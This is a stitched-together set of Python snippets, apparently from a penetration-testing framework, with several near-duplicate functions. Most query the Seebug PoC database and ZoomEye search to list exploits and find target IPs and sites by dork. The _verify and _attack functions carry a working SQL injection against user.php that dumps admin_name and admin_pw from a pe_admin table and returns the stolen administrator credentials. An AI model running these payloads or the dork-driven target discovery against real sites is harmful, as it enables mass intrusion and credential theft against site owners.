def static(self): req = requests.get('https://www.seebug.org/api/user/poc_list', headers=self.headers) self.stats = ast.literal_eval(req.content) if 'detail' in self.stats: return False return 'According to record total %s PoC purchased' % len(self.stats)
def retrieve(self, ID): req = requests.get('https://www.seebug.org/api/user/poc_detail?framework=2&id=%s' % ID, headers=self.headers, ) try: ret = ast.literal_eval(req.content) except: ret = json.loads(req.content) return ret
def seek(self, keyword): req = requests.get( 'https://www.seebug.org/api/user/poc_list?q=%s' % keyword, headers=self.headers, ) self.pocs = ast.literal_eval(req.content) return '%s purchased poc related to keyword "%s"' % (len( self.pocs), keyword)
def resourceInfo(self): req = requests.get('https://api.zoomeye.org/resources-info', headers=self.headers, ) content = json.loads(req.content) if 'plan' in content: self.plan = content['plan'] self.resources['search-limit'] = content['resources']['search'] return True return False
def resourceInfo(self): req = requests.get('http://api.zoomeye.org/resources-info', headers=self.headers, ) content = json.loads(req.content) if 'plan' in content: self.plan = content['plan'] self.resources['web-search'] = content['resources']['web-search'] self.resources['host-search'] = content['resources']['host-search'] return True return False
def search(self, dork, page=1, resource='web'): req = requests.get( 'http://api.zoomeye.org/{}/search?query="{}"&page={}&facet=app,os'.format(resource, urllib.quote(dork), page + 1), headers=self.headers ) content = json.loads(req.content) if 'matches' in content: return [match['ip'] for match in content['matches']] else: return []
def _verify(self): if self.check_argv(): result = {} payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(floor(rand(0)*2),md5(1))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" vulurl = urlparse.urljoin(self.url,'user.php' + payload) resp = req.get(vulurl) if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'user.php') result['VerifyInfo']['Payload'] = payload return self.parse_attack(result)
def _attack(self): if self.check_argv(): result = {} payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(char(45,45,45),admin_name,char(45,45,45),admin_pw,char(45,45,45))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" vulurl = urlparse.urljoin(self.url,'user.php' + payload) resp = req.get(vulurl) if resp.status_code == 200: match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M) if match_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = match_result.group(1) result['AdminInfo']['Password'] = match_result.group(2) return self.parse_attack(result)
def _executeVerify(pocInfo, targetJson, targetUrl, mode): url, startTime = parseTargetUrl(targetUrl), time.time() step, method, path, params, headers, match, status_code = initilizeJson(targetJson) if (targetUrl + pocInfo['vulID']) not in resultJson: resultJson[targetUrl + pocInfo['vulID']] = {} resultJson[targetUrl + pocInfo['vulID']]['verifyInfo'] = {'URL': url, 'Postdata': params, 'Path': path} try: if method == 'get': r = req.get('%s/%s' % (url, path), params=params, headers=headers) else: r = req.post('%s/%s' % (url, path), data=params, headers=headers) except Exception, ex: logger.log(CUSTOM_LOGGING.ERROR, str(ex)) return False
def search(self, dork, page=1, resource='web'): req = requests.get( 'https://api.zoomeye.org/{}/search?query={}&page={}&facet=app,os'. format(resource, urllib.quote(dork), page + 1), headers=self.headers) content = json.loads(req.content) if 'matches' in content: if resource == 'web': return [match['site'] for match in content['matches']] else: anslist = [] for match in content['matches']: ans = match['ip'] if 'portinfo' in match: ans += ':' + str(match['portinfo']['port']) anslist.append(ans) return anslist else: return []
def seek(self, keyword): req = requests.get('https://www.seebug.org/api/user/poc_list?q=%s' % keyword, headers=self.headers, ) self.pocs = ast.literal_eval(req.content) return '%s purchased poc related to keyword "%s"' % (len(self.pocs), keyword)
def static(self): req = requests.get('https://www.seebug.org/api/user/poc_list', headers=self.headers, ) self.stats = ast.literal_eval(req.content) if 'detail' in self.stats: return False return 'According to record total %s PoC purchased' % len(self.stats)
def retrieve(self, ID): req = requests.get('https://www.seebug.org/api/user/poc_detail?id=%s' % ID, headers=self.headers, ) return ast.literal_eval(req.content)